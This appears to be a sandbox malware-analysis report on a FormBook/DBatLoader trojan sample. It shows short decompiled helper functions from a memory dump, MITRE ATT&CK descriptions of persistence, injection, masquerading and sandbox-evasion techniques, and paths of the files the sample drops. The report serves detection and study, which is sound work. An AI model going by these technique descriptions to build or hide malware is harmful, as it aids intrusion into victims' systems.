Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: ad90f53c16f4723dbfc7d741e513584af803878a1631bcb5dab4c3bd19f8379f
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 8DC08C30380B00AAEB261F20CD11F0136A8BB41B05F4400A06301DA0F0DB78EC01EA00

Uniqueness

Uniqueness Score: -1.00%

Function 0594AD30 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0594AD30(intOrPtr _a4) {

				return L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x0594ad49

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 2d199167f5e67b0c448652afc12c004d7c5198039ebb6767f63dec9cb8e019a0
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 51C08C32180248BBC7126B85CD00F017B29E790B60F040020B6040A6618936E860D588

Uniqueness

Uniqueness Score: -1.00%

Function 059736CC Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E059736CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L05964620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x059736d2
0x059736e8
0x059736d4
0x059736e5
0x059736e5

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: dabfa46402ea02cab90c7d42c8cf533b16dd6937e926d3a79bc13f0d1bdb7ced
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 66C02B70390440BBDB151F30CD51F157258F740E21F6407547220454F0D528AC00F104

Uniqueness

Uniqueness Score: -1.00%

Function 059576E2 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E059576E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x059576e4
0x00000000
0x059576f8
0x059576fd

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 4660e4d26383635f7f24af3cef31a5ff9c323ec6efb909bc0213f5faa7131fe3
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: AEC08C702521805AEB2A9788CE24F303658FB08658F48099CAE02094A1C36CB92AC309

Uniqueness

Uniqueness Score: -1.00%

Function 05963A1C Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05963A1C(intOrPtr _a4) {
				void* _t5;

				return L05964620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x05963a35

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: f65f0cc4c85e5ddbb668f24f6db85cdbc6cec55aa5b12ae5e159cb1df60dd63a
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: B8C08C32180248BBCB126E81DC00F027B29E790B60F000020B6080A5608532EC60E588

Uniqueness

Uniqueness Score: -1.00%

Function 05967D50 Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05967D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x05967d56
0x05967d5b
0x05967d60
0x05967d5d
0x05967d5d
0x05967d5d

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 1df262126de4de12b255e6ffab015100f4b351c34b98218ea2418cb85a4d3dc1
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: CEB01234301940CFDF16DF18C090F2533F8FB44B44F8404D0E400CBA20D329E800CA00

Uniqueness

Uniqueness Score: -1.00%

Function 05972ACB Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05972ACB() {
				void* _t5;

				return E0595EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x05972adc

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 16529baceb337c699c44f41a2c2ae251edbc7cfbdc099a6da8e251a599394450
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 65B01232D10440CFCF02EF40C610B1D7339FB40760F0544D0940127930C229BD11CB40

Uniqueness

Uniqueness Score: -1.00%

Function 059DFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E059DFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0598CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E059D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E059D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x059dfdda
0x059dfde2
0x059dfde5
0x059dfdec
0x059dfdfa
0x059dfdff
0x059dfe0a
0x059dfe0f
0x059dfe17
0x059dfe1e
0x059dfe19
0x059dfe19
0x059dfe19
0x059dfe20
0x059dfe21
0x059dfe22
0x059dfe25
0x059dfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 059DFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 059DFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 059DFE01

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 91066565eccc2d75419c0b91f20a1e3d761dfa8193a0e98b82487e21a4423520
Instruction ID: 56b1b6ac4dc279d50e5c7ae89f63de6aaa23354e9ed3f33c7869dda9141e2a98
Opcode Fuzzy Hash: 91066565eccc2d75419c0b91f20a1e3d761dfa8193a0e98b82487e21a4423520
Instruction Fuzzy Hash: 8FF0C236240201BBDB201B45DC06F23BB6AEB84730F298214F628561E1DA62F82097B0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Threatname: DBatLoader

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Libraries\Iuigzwjd

C:\Users\Public\Libraries\Iuigzwjd.exe

C:\Users\Public\Libraries\Iuigzwjd.exe:Zone.Identifier

C:\Users\Public\Libraries\djwzgiuI.url

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Iuigzwjduoa[1]

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Function 02739128 Relevance: 124.7, APIs: 12, Strings: 57, Instructions: 3930
fileCOMMON

Function 02725D0C Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Function 02736388 Relevance: 32.7, APIs: 11, Strings: 7, Instructions: 1151
memorylibraryloaderCOMMON

Function 0273779C Relevance: 32.3, APIs: 10, Strings: 8, Instructions: 773
librarymemoryloaderCOMMON

Function 0273368E Relevance: 10.6, APIs: 7, Instructions: 73
librarynativeloaderCOMMON

Function 02733690 Relevance: 10.6, APIs: 7, Instructions: 72
librarynativeloaderCOMMON

Function 02738CBC Relevance: 7.6, APIs: 5, Instructions: 97
networkfileCOMMON

Function 02735AD8 Relevance: 3.0, APIs: 2, Instructions: 26
memoryinjectionCOMMON

Function 02735770 Relevance: 1.5, APIs: 1, Instructions: 17
processCOMMON

Function 02721754 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Function 02721ABC Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Function 027235DC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Function 02732A58 Relevance: 4.6, APIs: 3, Instructions: 105
fileCOMMON

Function 0273900C Relevance: 4.6, APIs: 3, Instructions: 58
registryCOMMON